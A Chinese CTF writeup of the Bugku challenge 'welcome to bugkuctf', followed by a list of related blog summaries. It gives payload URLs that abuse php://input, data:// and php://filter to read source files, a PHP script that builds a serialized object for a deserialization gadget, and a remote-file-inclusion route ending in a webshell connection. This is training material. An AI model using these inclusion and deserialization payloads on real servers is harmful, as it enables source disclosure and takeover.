bugku- welcome to bugkuctf【php://filter及php://input】writeup

最新推荐文章于 2024-04-15 03:43:38 发布
最新推荐文章于 2024-04-15 03:43:38 发布
阅读量441 收藏 1
点赞数
分类专栏: ctf 文章标签: bugku welcome to bugkuctf php://filter php://input writeup

原题内容:

http://120.24.86.145:8006/test1/

 

首先bp一下,可见提示源码:

首先,分析代码获取四个需求:

1.三个传参

2.$user存在且不为空,

3.读取$user文件,内容为welcome to the bugkuctf,

4.$file要求为hint.php,将其导入

 

txt传入 可以用txt=php://input post传输welcome to the bugkuctf 
也可以 用data协议 txt=data://text/plain,welcome to the bugkuctf 
或者txt=data:text/plain,welcome to the bugkuctf 
返回 hello friend! 
用file=hint.php 没有新的返回 尝试用file=php://filter/convert.base64-encode/resource=hint.php 当有过滤过滤掉read的时候 
或者 file=php://filter/read=convert.base64-encode/resource=hint.php 

 1, php://input 可以读取http entity body中指定长度的值,由Content-Length指定长度,不管是POST方式或者GE    T方法提交过来的数据。但是,一般GET方法提交数据 时,http request entity body部分都为空。 
    2,php://input 与$HTTP_RAW_POST_DATA读取的数据是一样的,都只读取Content-Type不为multipart/form-da    ta的数据。

        所以构造payload:?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&passw    ord=     post: welcome to the bugkuctf

        疑问:为什么不直接txt=welcome to the bugkuctf;

        猜测:应该是file_get_contents函数的原因 读取http request entity body 部分的数据 但是上文说过,get方法     提交,http request entity body部分为空所以采用了利用php://input读取输入流的办法。

 

其实比较熟悉就知道两个点可以利用了,php://input与php://filter

php不提了,之前的博客中讲解过,不懂得可以前去看一下

CTF/CTF练习平台-flag在index里【php://filter的利用】

这里讲一下php://input

当传进去的参数作为文件名变量去打开文件时,可以将参数php://传进,同时post方式传进去值作为文件内容,供php代码执行时当做文件内容读取

这题的效果如下:

加上php://filter的利用,读取hint.php的内容

load url改为:

 

http://120.24.86.145:8006/test1/index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=

可得到base64加密的字符串:

 

PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==

同理把hint.php改为index.php,顺路看看index的源码:

得到字符串:

 

PD9waHAgIA0KJHR4dCA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzc3dvcmQgPSAkX0dFVFsicGFzc3dvcmQiXTsgIA0KICANCmlmKGlzc2V0KCR0eHQpJiYoZmlsZV9nZXRfY29udGVudHMoJHR4dCwncicpPT09IndlbGNvbWUgdG8gdGhlIGJ1Z2t1Y3RmIikpeyAgDQogICAgZWNobyAiaGVsbG8gZnJpZW5kITxicj4iOyAgDQogICAgaWYocHJlZ19tYXRjaCgiL2ZsYWcvIiwkZmlsZSkpeyANCgkJZWNobyAi5LiN6IO9546w5Zyo5bCx57uZ5L2gZmxhZ+WTpiI7DQogICAgICAgIGV4aXQoKTsgIA0KICAgIH1lbHNleyAgDQogICAgICAgIGluY2x1ZGUoJGZpbGUpOyAgIA0KICAgICAgICAkcGFzc3dvcmQgPSB1bnNlcmlhbGl6ZSgkcGFzc3dvcmQpOyAgDQogICAgICAgIGVjaG8gJHBhc3N3b3JkOyAgDQogICAgfSAgDQp9ZWxzZXsgIA0KICAgIGVjaG8gInlvdSBhcmUgbm90IHRoZSBudW1iZXIgb2YgYnVna3UgISAiOyAgDQp9ICANCiAgDQo/PiAgDQogIA0KPCEtLSAgDQokdXNlciA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzcyA9ICRfR0VUWyJwYXNzd29yZCJdOyAgDQogIA0KaWYoaXNzZXQoJHVzZXIpJiYoZmlsZV9nZXRfY29udGVudHMoJHVzZXIsJ3InKT09PSJ3ZWxjb21lIHRvIHRoZSBidWdrdWN0ZiIpKXsgIA0KICAgIGVjaG8gImhlbGxvIGFkbWluITxicj4iOyAgDQogICAgaW5jbHVkZSgkZmlsZSk7IC8vaGludC5waHAgIA0KfWVsc2V7ICANCiAgICBlY2hvICJ5b3UgYXJlIG5vdCBhZG1pbiAhICI7ICANCn0gIA0KIC0tPiAg

 

解密得到代码:

从上面获取的源码可得到如下信息:

1.提示hint.php中提示flag.php,从index.php可以看到对关键词flag进行了屏蔽

2.hint.php中定义了一个类Flag,很有意思的是中间有个 __tostring 方法,这个方法可以理解为将这个类作为字符串执行时会自动执行的一个函数

3. __tostring 方法执行时,将变量$file作为文件名输出文件内容,结合提示flag.php,猜测屏蔽的flag.php文件在此打开

4.在index.php源码中看到了$password的作用

 

这里走进了一个坑,一直在想办法绕过flag关键词的屏蔽,但是限制于php://fliter的格式,一直不得其解

 

正解应该是利用$password

之前说过Flag方法当做字符串执行时,会自动执行 __tostring 方法,注意到echo函数,只能输出一个或多个字符串,所以只要$password为Flag类型数据,且其中string类型的变量$file为flag.php即可

理解到这里,就懂了为啥多一个很奇怪的unserialize函数,其作用即为让你用字符串方式传递一个类

具体函数用法不多说,以前博客中有讲过,不懂可以去一看

实验吧-天网管理系统【php弱类型==与===的利用】 

写个脚本 得出password的 最后要构造的password 序列化的

<?php

class Flag{
    public $file;           //创建一个Flag类
}
$a=new Flag;                //新建一个Flag类   
$a->file="flag.php";         //引用$this->file     file=flag.php
$a=serialize($a);           //序列化$a
print($a);

?>

定义一共类class 跟hint.php 相同 
执行一下,得到最后password的payload :O:4:”Flag”:1:{s:4:”file”;s:8:”flag.php”;} 
http://120.24.86.145:8006/test1/?txt=data://text/plain,welcome%20to%20the%20bugkuctf&file=hint.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} 
file此时就可以不用php://filter了 考虑到include 包含 
echo函数,只能输出一个或多个字符串,所以只要password为Flag类型数据,且其中string类型的变量password为Flag类型数据,且其中string类型的变量file为flag.php即可 
Flag方法当做字符串执行时,会自动执行 __tostring 方法

 

将其作为参数$password传进去,bp可得:

在这里简单说一下php的反序列化

将原来的某个对象进行序列化之后,从序列化后的结果中就可以知道这个对象的具体类型和值

在这里简单说一下序列化后的几个字母的意思,以password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}为例

  • O(大写):对象class
  • 4:4个字符
  • "Flag":对象名
  • 1:数量,一个
  • s:string
  • {}里的为参数

反序列化可以理解为序列化的的逆运算

--------------------------------------------------------

这里有3个变量 user file pass 用 get 传递

用 file_get_contents 读取 user 判断内容是否等于 welcome to the bugkuctf

之后 include 包含 file

需要一个内容是 welcome to the bugkuctf 的文件 鬼知道文件在哪...

别忘了 file_get_contents 可以读取网络上的文件

file_get_contents('http://www.baidu.com/')

需要一个在自己服务器上新建 a.txt 访问地址就是http://www.baidu.com/a.txt
txt内容为welcome to the bugkuctf

构造链接
bugku CTF welcome Writeup-ChaBug安全
返回 hello friend!

再看看源代码 include($file)

变量可控 存在文件包含 服务器上不知道有哪些文件 那就试试远程

服务器新建 aa.txt
构造链接访问之后
bugku CTF welcome Writeup-ChaBug安全
空白说明包含成功

菜刀连接

flag在flag.php里

 

xuchen16
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php://filter与ctf
m0_73973498的博客
10-11 391
这篇博客主要介绍的是php://filter在ctf中的常见利用,关于php:/filter的介绍可以去下面这篇博客,讲解的非常详细。
文件包含漏洞php://filter相关知识
彼岸花苏陌的博客
12-13 898
前言: 大家经常看到CTF比赛中web方向有文件上传漏洞,那比赛的wp有很多,比如这样的 ?file = php://filter/read=convert.base64-encode/resource=login 那其中的filter到底有什么用处呢? 1.php://filter/ php://filter是文件上传漏洞经常要有的一个参数,用于数据流打开时的筛选过滤应用,访问网站本地文件,在面对一些CTF题卡一些黑白名单会很好用 2.php://filter参数 php://filter主要有三个参数
【CTF】ctf中用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 2986
ctf中用到的php伪协议总结及例题
CTF 中PHP为协议总结
秋叶依剑
11-09 1406
CTF 中PHP为协议总结 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过...
详解php://filter以及死亡绕过
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
localhost 88 1.php,ctf中常见的php伪协议应用
weixin_39872257的博客
03-10 337
ctf中常见的php伪协议应用0x01 知识储备三个白帽payload:php://filter/write=convert.base64-decode/resource=shell.phpbypass:死亡die,base64在解码时会忽略特殊字符pctf2016payload:data:text/plain;base64,MS50eHQ=bypass:stripos等if判断hctf2016+...
CTF题型 php filter特殊编码绕过小汇总,2024年最新程序员必会知识
最新发布
2301_82243078的博客
04-15 944
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!将flag.php内容解释为UTF -8编码识别后转化为UTF-7进行输出。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
m0_65336233的博客
10-17 1337
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
XCTF-攻防世界CTF平台-Web类——17、ics-05(php://filter 协议、preg_replace函数命令执行)
Onlyone_1314的博客
01-01 2901
查看题目: 提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统,可能和后门程序有关,位置在工控云管理系统的设备维护中心 打开题目地址: 查看页面源代码: 只有设备维护中心的链接点击会跳转到index.php: 显示:数据接口请求异常 再查看index.php的源代码: 在云平台设备维护中心处有一个链接?page=index 点击之后: 它以GET方式提交page变量的值为index,后端index.php处理之后返回index。 传入page=123456,返回123456 所以我
ctf web 文件包含漏洞(例题)
weixin_49298265的博客
11-29 3797
文件包含漏洞 php://协议 php://filterphp://inputphp://filter用于读取源码,php://input用于执行php代码。 一、php://filter 当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行base64编码,阻止其不执行。从而导致任意文件读取。 http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.
浅谈 filter伪协议的特性
qq_64201116的博客
07-22 2554
对我来说,我以前对filter伪协议不甚了解,这次接触了这一题,就得主动去更加深入地了解一下filter伪协议了。以前呢就知道php//filter/read=convert.base64-encode/resource=[文件名]这干瘪瘪的一套,用就完了,现在看来深入了解是很有必要的。......
CTF中常用的php伪协议利用
weixin_53146913的博客
04-09 938
file:// 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd php:// 作用:访问输入输出流 1. php://filter 作用: 读取源代码并进行base64编码输出 示例: http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要bas
Bugku——welcome to bugkuctf(一道练习php://filterphp://input的好题)
csu_vc的博客
10-28 9363
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
谈一谈php://filter的妙用
beyond__devil的博客
10-19 1万+
原文地址: https://www.leavesongs.com/PENETRATION/php-filter-magic.html 这个可能是一个大牛,大家可以看看博客去,我没看过。。。 php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,
ctf中怎样获取php文件源码,CTF中文件包含的一些技巧
weixin_39580682的博客
03-09 3694
前言文件包含在 CTF 比赛也是常考的一个点,这里对一些包含点的原理、特征进行一些总结,并结合实际的例子来讲解如何绕过。php伪协议的分类伪协议是文件包含的基础,理解伪协议的的原理才能更好的利用文件包含漏洞。php://inputphp://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。使用条件:include()、includ...
php://filter漏洞利用实例
AnywayC9的专栏
02-04 5588
根据php.net中的描述,http://php.net/manual/zh/wrappers.php.phpphp://filter 是一种元封装器,其设计的目的是用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。 在文件包含
CTF/CTF练习平台-welcome to bugkuctfphp://filterphp://input
热门推荐
Sp4rkW的博客
09-01 3万+
原题内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
记一道集PHP伪协议&PHP反序列化综合运用的CTF
qq_38680693的博客
08-05 4201
题目:http://120.24.86.145:8006/test1/ 首先拿到题目后,毫无疑问,查看一下源码 &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($user,...
CTF Web php://filter文件内容包含漏洞
Drongin的博客
12-09 1万+
MCTF Web400 http://web.mirage-ctf.cn/web/8a43a97ced320c18ec254577a91a0d92/ 点击后发现PATH=flag这个很熟悉,有经验的老司机第一眼就会看出这里可能有php的文件包含漏洞,自己也百度了一下,通过这个漏洞可以看到源代码,加上php://filter/read=convert.base64-encode/resou
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值